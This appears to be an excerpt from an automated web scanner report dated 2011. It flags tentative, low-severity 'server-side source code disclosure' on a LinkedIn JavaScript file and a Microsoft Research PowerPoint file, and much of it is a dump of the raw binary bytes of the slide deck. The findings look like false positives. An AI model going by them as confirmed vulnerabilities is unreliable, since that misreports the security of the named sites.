http://vasco.com/login.aspx
http://www.register.com/font/vag-bold.woff
http://www.vasco.com/

Issue background

Server-side source code may contain sensitive information which can help an attacker formulate attacks against the application.

Issue remediation

Server-side source code is normally disclosed to clients as a result of typographical errors in scripts or because of misconfiguration, such as failing to grant executable permissions to a script or directory. You should review the cause of the code disclosure and prevent it from happening.

13.1. https://platform.linkedin.com/js/secureAnonymousFramework previous next

Summary

Severity:	Low
Confidence:	Tentative
Host:	https://platform.linkedin.com
Path:	/js/secureAnonymousFramework

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /js/secureAnonymousFramework HTTP/1.1
Host: platform.linkedin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=604800
Content-Type: text/javascript
Date: Sat, 03 Sep 2011 13:23:59 GMT
Expires: Sat, 10 Sep 2011 13:23:59 GMT
Last-Modified: Sat, 03 Sep 2011 13:18:03 GMT
Server: ECS (sjo/522C)
Vary: Accept-Encoding
X-Cache: HIT
Content-Length: 144344
Connection: close

(function(){
var l,
doAuth,
h = [],
valid = false,
a = "",
fwk = "https://platform.linkedin.com/js/framework?v=0.0.1132-RC5.9322-1337",
xtnreg = /extensions=([^&]*)&?/,
xtn
...[SNIP]...
<?js ?>";
l=l.split(" ");
var p=l[0]||"<?js",o=l[1]||"?>";
if(!p||!o){throw new Error("Template markers must be set.")
}if(p==o){throw new Error("Start and end markers cannot be identical.")
}p=new RegExp(b(p),"g");
o=new RegExp(b(o),"g");
var n=["","var p=
...[SNIP]...

13.2. http://research.microsoft.com/en-us/um/people/helenw/papers/fullMashupOS.pptx previous next

Summary

Severity:	Low
Confidence:	Tentative
Host:	http://research.microsoft.com
Path:	/en-us/um/people/helenw/papers/fullMashupOS.pptx

Issue detail

The application appears to disclose some server-side source code written in PHP and ASP.

Request

GET /en-us/um/people/helenw/papers/fullMashupOS.pptx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: application/vnd.openxmlformats-officedocument.presentationml.presentation
Last-Modified: Thu, 27 Nov 2008 00:42:08 GMT
Accept-Ranges: bytes
ETag: "b84f5afa2850c91:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 13:24:41 GMT
Connection: close
Content-Length: 817424

PK..........!....\x....7......[Content_Types].xml ...(..................................................................................................................................................
...[SNIP]...
.^-.....I.W.y9_.J...Oo.").......l.1...ruV$    }........._~w....3.....%.e.\^...k.f..|..K.S|tsQ,_...am.........M.QrSYS....u:....t....s5.f...U..m..Q.9[Tib.zU.i.[....V.c..|....k....._....
;SQW..........j.z'<?...v8N8............m{.X.0W,z^.U7...g..s.e..GiY}.>.    .....0k....1.~.=..#X....G.[.EQ1..rY..I.q...^..Wee}0..:O.OI.Y...z1..Y."...J.......L..w...l.>...=f@...a..I.:|.t......1...wW.......4..).h.wAp....[..U\TI1....mgo>.....a..v..q.c..../.8..-....F..w;._:....v............K7z..b..$........F.,..g..^.a....n.`..dg..r.T....H.*..-...e.6...)`C..S{"..N.-...p]Pm...~,..=.}O.... t..@J]..?    }.@a..p!...t".$..}.m.6.C2.N....`...g...6R...O..9.0.0Q1w....G..5....e.6...}8.....P|.SYI..&..Y~.HS...]@mI@F...Cr!D..NX.''ia]...(.N..lqi....g.......w0.p......}..H.o.-.,.33_\`M........u...g...E..m..X..Y...$6..I....JOr..p=.......*..6U.....K..n.!........am    ...,.*......O....T.j.k.N.~_.2..~8.<_(T'
..u...;aT..4.>.1......    ..\.....R.......).....M.....W.M.e..O.]...B].ED.n]....>%.;.N."..f\..f..Ad(H.U@d...EmJ.n..x2f.J.D..kht.s.Sc..@.2..#`b.....r^.o..S).F...L.....    ..j......&QM...H...2V.C.....v....X..d,M..k..".V..[.,A.Z.C...G.O.<..........
4.*....{D.....d.mr.js.n.....9..^![H..`..}...-zL..2X..k.v....
{.-.C......|.v
...e.%-..<......o.9I...K..t.jS..........]..[eJ..o.4....B.S.....=...n.....5W.6.........z..z...\.....`..v.sGA..-.F^
ih.G!..F.........f....|G...H..G...<.....UQ.!...$.M_.../YF....T.
..9..G...6...u..T...[    =..Q}..!....<.F....8..>H............)".N"..Q.:....8$$......m1...d......d..&V..=..v .{;dr.........z..&.@.N}..}q.0.....<".Mj..+.S.6E3......+......j.,.V...2P.$...&5.8*.R{....H
2.M`...c%KDf.........7l..>:":........G....:...>VE...W....?!..e`........M....1... ..V.#..cG......O.
.O.O.....+.G..L..0..........{.D.....H    .r5z.b...q.Y...(b.S....S^.v.c7...x..YuQi ...4..Yi.t>....."......PK3.).7.6.U9..9..4W}Sw..5.V.x@n...J..+..1.1...Q.O.1....+.%..E.GFY..'..'.f.^1E....    .F7.~..
U..;d.oIQmB..m.$...=....v:.s..j=.......l....D:...d.....).@-...(.C........bp.....    0...V..$r"..p.cT......5;A.+r'..4........(....w.i.~.x...u.....^......2.j.....?;... ...~H!..[..m.b_.......)-p....yW.X..`.......:YX.p.G.I    ..-..fG.....b(m..].P.B?]...7.}S........).F...5.>Y.....y.......=.'.g.-..b........D.8.1.y.">..........*..h...7..8...%AB.H..A5.@.=...`GM.x...@..L..P..ZHa....jTM"./.W.    .@......f..y.2...,.V.....n.0.oVe.|...\>a.....%~(cE.
..F.....X......>.9.....Ie.../...,..U].+yYn\.fzu...J~7..c.OG@t.....Ip^......rX..._../.
.V.j..6l..FeA...cXV^X0wl...f....1.2K._.....X.$F.QI.fcI.........Q.y    ..q5[.K%....u..H.7pL.'.E.{.....v.;iz.e..i5....9(.........>!{{.".....VG.y.].$.X.'.m...o..AM..;...(...p.Q.2qEd...&...R....I..#5..[. ...._....3.....*.{{.7...$4,..!th..B0.&7.kx....Ioaw..,..V.?.K..O..&.\M...ktj...CUh......P...P.,...TW...(z7.sa..Z..<Tyy"$b.j..Z....O.~:..F..%..m...;."...m.r.l.5B7...#T....Hd..6O=....
..r.....k"U.$hVD.Ng.S..d...G:.
..k..d..C/...
r.....!...4l.F.......0...u...i..G.|;.o.pY}.`.........(..U.}N.1.}...p
.c.#.....qxV...3...m.n/Y?xGj<..$o.
.\.......N...V....}C..`:k..%..*..Z....X...fv..!..!&...H......s(..n.#.r?p)....egrJ..w...t..DI&.auP...O..Zs.qR....MR...:.M....k.[.y..Q..^..20.I*.....!I.r.n.L.!nv..S'..    .....$....}...p..T2..H....$......!I5$....#"....$U...p#.5m...CeA.y^(+...8p.*..$.....u-...[5.T(P.ZU.jG......."
.7.2......q.n....A}....e....-B....UT....P.@.....^.G...-y......d..#.......w..~}Sw^.....Q.,9...7.U.;......|1=-..<Q....e.Z..^.Ky.3.x~Q..ev.f.w......[G..h.z..s....tT.U.....#...<...k.G..R..`..<.....]u%'Gw....*..
....S..s<d.....!,.........!..$..!
/?sC.............=.......3...g.p..Y..z}....O......y..@#.....~..%...)....mY.....d.?.8.o...<..{0..:.. cX.[9...
,yl.'7.o.(...k...&..Z.a[....0y.....?.>9g..#.._++.j........i...s..6=......./Wxf^...E....&.|...u\....>.Nc...l......w.......-.UX.-...Q..Oy..........._=.5..tL..W..P-..@.%..+f.3.E..>....W...h.....X....7m0.s...@}T..w.e.T.0..gF{TvbR..
-e..........Y.0    V.[R.w7..Zk.4nM.p..%....3l.G...K......ZT..i.\...7.z..E....M.PP..:<q....r....k..S.'.].4..A..lL.{<6}..oG.T?...-c.....@X..K.h..n...o?........V......x.............=.h..U.2.....a2.7.44.....u\.......~.........L=5.n.....?\e......'.I.....o...u..L.'......b....")...../#....*[...a.'.&.0. t..1.;<...Yl..{... &|U......`.F.j....4.V.A.\......X#.%....3.e.Y&^fJ...............m@4..............^..z..K...h&.._>.AQ...:_<.h....N..6.c....,8.......W....-H78....GDp....n.&`l..j.....].*[.m5.....@l.1
.~.......9...@l......l]..G..>....... 6...b....#8t.`.....(.....l#....    9V6D...?N.x.}....}....C%..B..a...B........0..b..=.^...C..)..y..b.q.7sp3.7......#.....C...A...x...v.>............5E.{lp*.......    eka........to.    ..m.....
..gsp6.Y....3?;8.O....w........%\'c.o$J..f...cQ.5WdF.#U.K........`0..;.*AB.^0...U!.....Q'.......]..Q.....|.08.5..@.".....l9.t.?.)...E../...*6....H^;-.e.......g;........@.:...~_X..l.vGV.....x1....d.r....fhO......^jsQ,.8./........G.S.W..n0......MeM..qB~&...c...t....    <..=.u.x.3....t.fk..)1...z.7........A.v.#._...W....?YxMf.L............].<...U.xo....e...gN..Jk..w..j..>En....h...QA-P<..m./.UQb.z...\O.......J.H....B...:4+nf.-.>..y....8..#.6...2>.....Hl....>.`Q.'L...`
1...b..i.U...CrA.].@.>.....g..7..tkrq...s...G....."...}....G^..b.b.`....R.g.K..%O.t....E...Y.XH..&T=....E.fC..M&R.j..eS..V......mc.&.........T..h.}..h...m....T.<.%.u.{.g........S...z..C.T.....VFPQ<..*..$....q6...x.+..R...bp....nT...ol.gny..=....;f
.....3..../..X.$E..._Q{5.9.@)!.......v..H 4))..B;R.....w.1..Fyl...$.B.+..Uy.-!Ty.-B...h....-..4..)._.-...].V.!....N.."..fQ.;./...#C.w"?R._..`.=e.O.7.....(.<.c..o....HXoQ..Md.P.!S..4...Q..s.    .Z.@'.]/Z.a....C..p...wx....mf^]?W[ou.S.&....a..*...a..E.zyU......;....R....'....Qw.v.    .p._...C5...j.l...25.k..vt...0..:.I.........v.4..N....AX..s.....<...1....K.v?4..8...z.x...Z..v..].o..H..9........y..).-M...4vh..V...P..j....-.ah.......A.CTq.a...I..;.u.....d0..*.[r.W..hsE...9..C".....5.......u2KA2H7.m.]...f...WI....@....l...Q..[..f..p.6.VJ....i.XU_....<-.u..v
...Z...[\.=,....(9p..,r5Q..z+J.......]g..K.L.+t.p...=/h    t.....6q.....Ys......h#...U .s.*.<..@....y....C...@.(G6.i|.........~..HG.N.$.....5.A"..S>..$....H...V..D.....O.g(......;U9.."...h...2... B.....p....~.D.......H......TQ|t9..D.Q<W.P....,|B..B..$g..T....<".G..Zu7........Q....G].w?...u..r.cUT..{..K.C.?[.{(...xl......<5..vUv5...    MF...j>.a(S...c..$...q.....C...U...Dh..qX.v5GY..    ..n..6    .M..EW..M.....w...........I..$.4.g.h....`dGh....GP...c..c.i>....6....e.}...C)...w..!O...gm.`fgl.."...{..rn....aw...v.q%...2..II....%..P.    ^@.V1...G..^d....W}..M.vN`.X.]Y...Y.m.6...O....W..fkG.,d...cr'.-..F.s...@u...1l...x.[....E.hs.Mx.9...$..Q.FP...X@...E%.....^E.$..u..Nd.Q.`...=.#.     s.O.).....xv...O.6G..d!}`,M.6t......o...1w&...1B.z.9......]..M    ...[4...<A..k1.
.....1B...9....+.i..&...@H..-z...b.....B.3...j..U.s....mG`7.7....&y....!l.......'...;...Z....`. ..S|.......2...;.. .@Tom...A.........c. ....s1...N...e4~W.... 0.h...........P....=...m....J|....\a.m.c.h~Z.#...J&....t.-...A.i..k.2A.<..v......c.I.G....P.......b...$....f..........{.......m.....cY...H.9.3...{.@r...PU.........R.4....yh[.i.u.X....'.L..s.../....I...v...+...'.g...D..z..`..E+
..iK...v......z..U.^...e...`..G..b.3Q..r...p.b.p"..1...{y8.Y..h... .T...z.$O#.8............L.O.f{=*.6...Pz:Tux.......H.9...p....E>.7.yC.........Sl.......g...g.B.]......r.....I.(q...'j.sR''.<!.....o(..{...d......w......N.Yk.Zn.Z6+..>7..........Q...SWe..G0.s....:d.}....t.....J.H.......-.K"(....Ce.JaM6Xm..l.......C....N..hD8X+.6l....=.joe5*.+.lv..4.....~.....]..N.*..b....M..Z:9..?.w^U.....2....y.....F.|.y..E..\n.F....z.[8.......*....i.iZ.9^.|....q..8..V...zk4AG.g..Z.......c/..H.......:...t..].>.l.\,.E. ...U\ ..%.    "`...g.W.}T..yN....|...T.e..a...(.wL......g...Wq...n......x.}L~k.cm..z....h..............5K...j,N.Y.ec%k..Q.;
{@D..4.u.%..f'...y....4.K:KQa..O...+&......\..3.U..8M.._.......c......9q`.5@`&!.....h...A.h..gHD.O/.7x..._g..U........W..*..i    .....>.....\./.E...B_4...4.ZP..I..Sar/i.....u")...gP......yf.....p..k.e.s85.g.o.X.a#sB......>...}..h...kr/.($.{v.<%.&c.....|....f...[..o.,..6..+.X..1.?e?%..
lT,........
..M.Z..b[..>...-.S.....),..Ka...p.8_c.}.....E@'.b..l.....).}..'s..g~Y....;.o..../....]...[3..]..m...^...)ky.\%.N...2Q...?-V    .z..Ce..m.........o2:tu_FG.i^.`...z.yv......s.......z....d=X}}.....b>...E..v.......l...R...7..n....-(.z..C.S................mX.*..Y.*.q.8.F._... p.7...S..{.`q..b.c..j..).?..)j....o..{..'.d...9m..I.)C.Z...C.=.........@E1.........hV..g......w..?}l..= C........d......Q%l....;.I....l...|Z..!.E.r..P.-.NT..-R.<    .f..q..>..
.F...-*...,.*...tQI..0}W..Ny...p.y.v.........rp.,.Wg..3.............xO.R'...
...P$...-.5.k..=......N..[U.,......!P.!j...R.N. .p..A..bt...I(W...<Ue<..^....t...q.#."...",....}...g:/RUw.E......6/b....QUm..............PK..........!....r.....:......ppt/slides/slide33.xml.[[o...~?....... ....F..'6.....{..H.+..E2.JVZ...9.s.%.f...L...I....v...3..3..?,g..`y...H7.{... .d2...8..Z..$..4a#.#+..N.......C.I1.G...lxrR.S6...4c    ..i>.9^..I....:.O.^.=..Q....6..x...u..g,..I.b...b.e...m.-.Y.4....)V...!./...1zJ..yv.].b.jq.kQ.y.Z.. ....(......p..>Q...r..N_.C.M[.t..#...?dK......5...17....}.....(.J...r,.?..rI.X.}..L3..I..(....BKR.W.!=.b6;...~...........E"!..T..3..G<f.<9(....B.j...l...    iy.=.$.7..K.$7........D...U.~$y..../.......
i.C0.?......,9......H.    ..F9........(f.<f>.....^OS.Bp/...^(.[...y.%![.O......7D...G...w.R.z....>.\.%A...l..F.u.$........@.....9....Tz..NH.Iz..1)..E.K*.....(.4Nn..0.Yp.pm..#.<V.WM.._.    .]
..._..J.%......R........A.e..    ..C1.v..)..,.:1]1.y........b\.K...d....l...;$.,g......_[\K;.....D..?o    b.......i....L....r...%=%._..}..@q......    .oK
O....Z.....9...=..).C..".M7d..O..5..w......G.">K.(..O.....8...9Ek"d..]..............z.D..O.....R....|.........o.....8..)..B........|.o-.|ia......qK..D.kx,.Oj!.(....j.-.Ni...lv.r$...I..|...~....;.=.
....IE........y.,X =$r..i.....&.........Po../(]A.......<-.,    ....MJdE%V...e...W;j~.+^Y2.n7(d.......[....U.}.x.........8......xo.....TY....&LkG..S.6f[.........s.....'...Ka.o.@g..8.5t. .....*...
..*.. I........u..l..!...5A.f..........U..s?G.C..E.........ln.....@.._.~...]..2...........y...5x.]Xn.7.,K.......~X.]..b..K.e...H..#.G.....6.U.SWh..n.......pC-}0..b9UQ...X..?hUQ....o..j_..._.t...H.=........S...H]n......To...;6.%aS .-%....A...,X.S..)..N3kGM(.!$.'@H..H.U.K.j.D.pK...b..c.....cL.3.!(..[...$....XUIY...W
...k9..S.oa.~.L.|..<'.]..T...    ...I.(..#..#h.P..3.z23S..e..3..*.,..=i....;c..AYY*...a.=!...oX=...6..o..;...$....(....w..d`x..vDj:.../U..>..VR.@..5Aiv......$...+.*;.....B......\.2R.4.O...-.....[g..4RR.e..p..D..IX...i...g?C..Y....h%~.^=I.>.._...M5..x...~...g[}w3.&...z......&cz...L.    S..M.....?........(.`....."K...j....^!82..O....Bh.+5....XY.X).....+ G....8....kp1..!........N4.Q....4qJ.(7..g....b&'9T...Z{='..E.+.K..ua.^...)......<.0.G.7%.bPh...
.D.".ERz..z.6.&F..<.V.....3.~s..*&Gk.'.6(..d&6....S..lO.~..IB..p..|........>..R}..nJ.....X.+..>/;............8'.R.:.r......*....~..5...<(.e.z.TG\...pJ<v..Sb.3..\.....Z...:mT..    ..j..v..h.M....Q.,....l..zW.......b........p_u8..A.....s-N
.........    ......"

.....L6....pp..K...A..w=qq.&XN.1T..T.pM.r.e..i...J..........=..(..9.0.......?7...g....L.    d....q.o ...p"!..L..#..&...-.x.L...!.P...L.sz.0..........2.....aZe.a....`Y...*.*.......>.kP..D.1..i....2q....i.+T...A%..P.T..&.........x.K...oAF.f....*MT...,..A.k{...[}.4a/.H..az.._........H.@E......kja...N6.?m|.>BB...K
..?~.....V>:.r(.~....9.L.. u..t.GO=...!.5.O....q|...m".8.E...=..d.%.. vC{;.....ZX...!.......)e..`.....Z..h.N.y.#g...(h.Y0....K..$N..$k......Ac.s.@...O......~.&2.......j....8)....JV....-.y(.M...:........_....../.M......n.w.#*J...n.L.G..7"..^.[p.F......w.......P.f.f....|.5R.[.].....m....N.Vd2.(....9......>dC.z*........8.h.o.6_. QU....9.../"......:..1_....[H..<..E9.0p.l.T".([.....C....tWo...9.w..Gb....6V2.G.\ahO"-.... ..z)r.I..|.............PK..........!.0.A.............ppt/slides/slide17.xml.][o.H.~_`.......;.M$5m.b'...I..{v...h.h.T....`..~.NU..(..&q
th.X.S...S..~...*....J..pd.4.YI>+.i.8..v~z......y..yr8..T........V....y5..G..^O_..f.d.W?..$.o.E..k.Y.^...3j]e...x.j...H~_.....Lg..bv.J..+).,...j..+U.zHm.2.P.....#.lv....j}^&    =.......c)~.p....9.5..x...^..d1.g.bxx...B..Oo.......c.n.G ...?>...Mm....y;[..Sv.|.S..j.=....xD..q.p..:K,[.......b.{e...I....>
...[SNIP]...
.....l...{.+xf..[......u..U9|.......Z..l    }|    53..|..@.....&I.......==Kqp...FX
l..+...Cp.*...    .i....?.}N..]...U..\E7:.Z.NR.5..0m......S.    .6.    .rw.r*~..[|J...R..-....fz.UwP...)j.#./l.......K...-.T..E(r.N<%s..6.5L.wA...rZ.|z.b_.
......s.K..p...".........a..A.S$th3w...V....    .f........O/xH.c/....,..w...B5@.6..u..Z.AY.&er...'.....?.'...b..l)N..v.........7vo...c........tjE..(...:.q.)..O.....F0.z...v[;..?R....    ....9...Uc..
.P............PK..........!.....&...........ppt/slides/slide16.xml.].n.H.._`....`v...I"5m.l'...M..{..4EI..H6I;v.....}.y...:....m9.\..Sd..S............2.......3.4..q:=..|y~....
.q.dit.........?~.Ge26P;-G.QoVU.....g.<(.ey...$+.A....p\....<9.....<...._t..M&q.....y.V.."J.
#/gq^......ET..V.5.c.,.H..../.(....c._._
.........W.H.9..;..D1.3E1<..T............07..................~..~ZQ6.}XQ.Pv...NiV|F....t..*..S...P..,..4.........odc4gj>...]..T..(.?2x..%........A%........gY>.4.2...}^.9c.r>.nO...A.
.F.QRV..]..V..`.Q.?.5    .........oG=..7.qQ14...:K..."FU._..ee|mP.q.U..(5...M<...`".SZE.".......@...(.    ..k......FH.........8</@.....o.    ...8..e.ZZ._. .fY.!...(`....Uw..*.k.'(....nIB.X...&.5..>...a..!..&.w`{^..I.a..u\A..)1zB.x|.T.q].]...,..+.8.U]%...8.....}cr.
.....Ua$.i|.w...\.99.~.08pl.:8.;.....?....g..?..4...W    ......!.hB..,K.t<...,.....h.....=    ..{..
.[h..}F#D.W.G1..0f..>.K...XN4...C@.j~.n.,...q.0....,).. .4....*E,(.x....9.l7.4....<.....o..
^U....?.VMkH...d..+ ..9..2... .B4.U. .50 X@...r.!....Td...I.Y..?@.q..B3......g$...'V.
..KI...#.%..}..W>..}..%...>..T.1..N..D.'R.4#A....l....."....G.x.Z......^)a.......U..9.8........,k.R\n7......p...{....C..7(Q.I2...Q..Vj....)..q..o....h.n...    T..._`....C,..pv.....
...YP.QE.\yU#7.Yk.........s....>.......Z[0.b..._k..ly-.*9.........e..{.);.....i...8W...P.....I....V.^U...W.r....t.,..L...*'WeU.!.tZ+.=v..
z.....Q.o-....c...G;...)...uz.h.[.O....DZtk...D7y..>....c"s.G^.'    .P.....{.)=D...2L......*.U..$..".Z....@X...K>.....4.u..Y.^...^T5...b-.Z.e:...ghj..%Zs..d.64.6.[.....wCS.h\1.V..:..6...CHp.;.N...Y7/y..Z........f9..U..v.9.[..C.....6@..M{....O...ZC[..."............x..v.......L-....Bl..4L....4'.) j..6*.Q..JmT>6....\r.{t6.v.k...O....66.=KCkhZC......AC..3.1..3.1{..eZ.i!....bZ..;\......ne`./....^#..|..........n...n..9u....../."..(.8.....iMkh.\c..._f.?iy./.:...8...8.....+%.ah.s..6T_.........n...T0sOg......M5....s....]..u.........J.u..".gq.>...o<.#..............(......|.~..R.1..wzF.BG..$.G....UT._...<..1.m.gY.^..p.c..R.i.....&3x.%.'.O>......M.....AQE..o...6.FX....a........*....0'....K".`'W..I2f....y'.3p.l...8.......`........=.............p.7]7o..=...csP_m...zm..ZAE`.N.....x.h........."[..#....9...Eq.".9uC.k4..'d...I1...db.......py..8C.;.0.....bL.bw.P    ....C..F..'.....C.g...;.\Y..l.tlr..!.....S.@....UC...    .......(..t.D..L....$ ..VL.9v.wLSLNM.9r..R..    .......A.G...c$...XV|...._..i..?J._....h...b.,.    ..a.V&.4...7..    .M..o.A.5H-Opg.j[4 K.Fd.|..<U.&..IU.7......j.....<...X5....=.....`jn    F....J.2L.4...,+.zaUp.[.....$S..T.5,j..AZw..u.$.$.^..N.[cH.R.i..#..o....Rq..".IJu.......Y..{Lb+....G....6.a.9.w..(!....u.....8...2v
z.$qc.R...C=......l^._..:..4.im.(.........b.<..rl.eE.u..5.n..-.l{&..@.e.X......g{J....>.5.h......n.Tjx...bzu..\,..?x...7...+h.%..........6.&H......C.bM...2.u.r...BYa.....s.Z..P5.i+...E...\..R....}w(...Q
O8[.....k.J.J    !._hmR~.P@5..Z]1......9z........W8.....uL..TX8..%.....U.CLcip..X,w.[.-i,...X..t.d.c.|..$.....D.F..b.}.K8z....!.5.JH...........ZGy)&.j.^.X-........S
gR.U...5..v.4z.....d=.S.d......P:........C....ZR........&EK-.}..$-..........$...-e.........u%K..0.....rbSP`."H..n).3E    ..-..].)...o/....1....~...E..Tk:...X..y..o..w.}.KD....szz.,n...S..YU...C.8.n+...xy.N,e.........=...vm.}...%.$...W..m.3....-X....P.BI.<!Z.&...lYk...%...|G.......nCI8    .n.....A...x.Y..l..... ..*..(.op~.)..Yap.>..D.K.i4]..8..E.......HK..Q...;.Y.}... .-..ak...x@.j.K.P...!so...X..V..F......(k....
..~. N>.c.f.. .fl.D2..Cx.cNR...._....._.....n+...d....T...~.......l.a....,v............d.Ush.......I.A"<<...I..0..V...U......1A.x..T...`.}.r...v....n..-...B..$...5l..2&.PR^..>.....mia....X.k' u..J..E4.T|I...~.h.9w)-..jz......T[!#.*x..xb..3I.#    .Z..K...G+x<.C..H.`kb3...*xR|...A.S.l........*.qw../9..q.g6.KJ..z...&"..^......8....is.....k....v..=.L.[,..lh%....f5v.....>...~.Vjf.h.}.`G....0..@.._..I..bYV..gz.....9.*>.>@.r...xn1....W.Z......
.K.(..O.f.............{& wVwg..,../....#....    ...SW|@.eg..}.R.o..K...{...2..o.*#......ZT.;6..\.[..z.....I:...O..&.H....f$......=..l...*(..Q4....>...=......7.r.\..<t}..En.U3...y.2..tz.......j:.x...-.*.+.;.'.Q.......0...u..ZQ.o...3...c...qd.Y...    ........f.D..{..# HudZ..s..).*...\......z......w...ow.W..Q0...@.m*..'dBO)#...g%e.7....?.$ .M.....2O.S..t.V.3..,cU.*..GUf+..6.+.O1....    .s..*..H...WG.+....".1..Q.:....A0..8}.g7.e.JV.DP4..N..pu...*.O...5,.1.Pky5..;1....y6,......[..+'..S..U..U...n..N.:..eR....6..w.....!=g.3..V..D..c)..g.{mT......@..z..._9s.~.Y6.
4..x$O".p..c<J.Q@.'......i...ZI.7G.|o..Y[..pG.%M..L.-.A....n..?p....m;...ce.....?...k.H..<.&.......7e..O_;.......n.!lL[D4C.. ...#..A.........5..=.I.bj........fs..*..u....6`|....."..P......j;..3..1yE{...../D    ....H<.Y7.....M..'.NA.......Xa...~.2......\m.LQf6.%......;..w.......4J..z...3]{#.....).3./hV..*........d.'....[..#./.)QL...'V....G...n.VU..E..s.@%.ID..j...n.\..M... ...6G..O#.).+....~.J.Oy.>?K/.E.O..i*\+1.....^.]4.....{...J..q.ky..C4......<.|./cF9..J..r"....\.}[d..,..hIg.7.....
8,.^S....EA{Z:A.:........h.._..?.I.......-...._./[.zEG..C...m..b.........:Z.l..$r.s.e}.L...&...<...t.v..}.2.vd.@.;....r....$.v./Gb.Ko$G.Y..H.`6txA'..:J..    ..n.....r..w...tJ l.A0-...)..xd?G...Q.2e..B...!R.t.M.....vGe...q.WtCG*..8...q.c5..et ......R.ZF......E.#...J..:    q#J...k....,uYw1...".uE..#..Rn.Q...d...,Ky.    ..Gc.%...19..v..L.zA..k/<../Gk...G.!.....{.2..,    ....8......U..@.0...Q}......a...|`..m.J..bh...3"..j.Jg(..4.C%..o.`EoD.....uN..8..<D...(s:E.. .-.5...3..e...H.<f.....e|.'quG|.>6.....P..A...~B.k%.d......T..M.I.._F3.|^.<8.....X...2RS..#._.H............".q/.#)..vORX._.I.L.x.ak`'1.....6q....?.}......q.()W    p...8..5..8s.V....A.%..T.-.....\..)N..]..@..k..akp.f.j.8.).{...?..~
r.|.K..Z..(o+-...qx.3P..6.RY>.....9....|a.;..Kj..U......`lm....,u....@..D.:.......U....    .T.6.-.h......8...:5..L.....).y.O.-..5...Z....@.g1Ay....B..."}..e...D}.rna....t....9.g5V......X._Z./.$~b...M;$.:..V.......B.s......}..K"..by...[.^...&0.g.....#.La...:......{.^.}u....,...q.L..N...5..-.{|{,@Y..D.....[...P...y...i........A..3p....6.bb...!..".Y.8F7.~f..|."x..v.6@.k...."#...@......R.uM'......ZE...vq..(.U"..x.".v$..2"    .\>j|.....).x.G(Y.?bM\......1Q9p<..8M...........PK..........!...6.Q...........ppt/slides/slide34.xml.T...0.}......H.E..].}iYT..0.!Q........;    .].../.c...s|2..C)...[(...].#..b..f.y...bd....%y.......wc.Z..dK......4.,.yI...\..F..8.4.....PK.u..~T.B.:..%_m6..3Ew%...1\.......A.oA..[.    ..4.ft).[.2....2z..&.....
.za$I    ...>.....0XD.o.$..6...I
..!. ..?!......6.y..O.bi..Bt....NE=...k:....p.....
%..Y.o.I.<=......0........e.3......$M..Y.^..A.....w.$..n....M.s..><....&...........-.....\+.&3^.1...6j.......*..FR...6...R....F..n....[.hw.JF....Q..r^..?.''..`..w.......\    ...&r...0.~f..........i..p.7....n....Ng.JF..5.... y.....1......3...E..rg.~..89{.J....`.jl...dT./D?.......z.[.F..j.=.x..........PK..........!...B.....4    ......ppt/slides/slide15.xml.].n..........A6...M"....m.4...h;.._.Z.$b(RC.n{..y......w.FR.u..VW.L."Y.S...S....4...0..49k...-#L.. JFg.....x-#/.d..i..............<..x;.{.Yk\....i.... .N....i6
...N.Y..N.S....N.(i...u.O.....O...0)x#Y...F...i.[....4.s4.....3.....7..eaHW...lz;.......dF4..ZF.L@....!.c&x...3..dKA.i.M..z...t......x)..O...?.._....<.._/x.Tv...NiV|F....t..".S..?...Oi...HR........(..9S...Q<OA.............T.TQ.q...F...:.....,.~4.2...m.Du...i.x.L..D.{..V$..yq[<.!k...z.5..u..b.09..-X....C...(+.2........"FU..e.ya|.p.q....01.d.c4....".cR..,(.,...-....0.|    ....# ..=......%_W.>.G...|...C..Y..03..W).....8...4...W.0.H..*;j....H..D.p.d.
k..4#&....>....j.],P.=...ym.'...ul.%...)1zZtq.>(..!....3.......Vq.....(....7.'.....=A.0..88..{eY..\.t..;'..X'.m.;....W..{.....c..k......z..EP[4.hp...:.v0u.Sg.gA.....t=I...~...6.....G.....b.Ef..w..;&'K.qWI4..c.........8..D1[    f...83......3\.).AA...]?.0..'.&1_9.m./._.6(..U........iu..~..<....d
s.'....#..~.1.oL.(.p.. .s...8.e.C2`.s...k.3...x.-..$...8D.t..,.(^.I..&G.....<..|.w.<.;>..c...X.......U.H.$))"&    b.....".....[.d.P.u....2....3.X{..9S8...(6......R\oW....Q..Z[.=Hm..!..K.(.$.....hZ.=.......Z.U..y....    3.C..g..DtGq#..iT..7.$.....<..,...&7.bo.Ml-3.....{....=>B...........    j.m.R.5.b[......j..J..)+.......cRD.M....mK....>..*...j...
.$..@....".U......}^dA..:5.."..QAK#p...Zk...7...a;.@0~**...........w...V.Zu.1.M(...yR..v..Z.2.%.B.*3..G..<D..G.&.ZPk....*.M....a..T..(..`...I..PE..:J.4..1.?$....rJ..^k.LW...
M...F.n~.......c.@S....hj..;.:..Q.f...C9....S...JYu..w_4F...f,.6.9.ia.....(s.....+....;..(.F.4...g....C[T..2...F.MWh.M.[.d.....6.~....VbZ.-:....:....I~
.....J.T..R...&...*.`v....5....y:.....Wih.M{h.C....xh.1...F.4b.......JL+1......p.Gdh..}..e.tA.q.F:...2.3...>_.a.k..E.....ty.k..........{....=.M>c..._g.?yy.......qJ!OpV.............u......%.....Fm.N...t%.qx.z.T....tn.t8..uk_.-.r".@....s..,.........z...n.`...0..8.q.K.o....i....KfD....2.<t....Ah|~.....%.W..i<..M.,{....x.)....I.!.W.M..V...x?....|...4.....dE.....'..?#,....a........}:xf?".....9...;.2......M.....{b.f.........'].....wo.N..-56.<.....o=O..!..It_..n.i3tM..a~.{.....5.......2...b}@..%...}.Q\S.d..#.x...HN...*...i1...0....ph.........A&.d.q..Sx*.>[....7..    .l..C+.....y.]..v...........e#.c.$b....}Z>=.>...x..%AJ.(..#..5..A2.C.u..n.....D.._...;.)&.._...
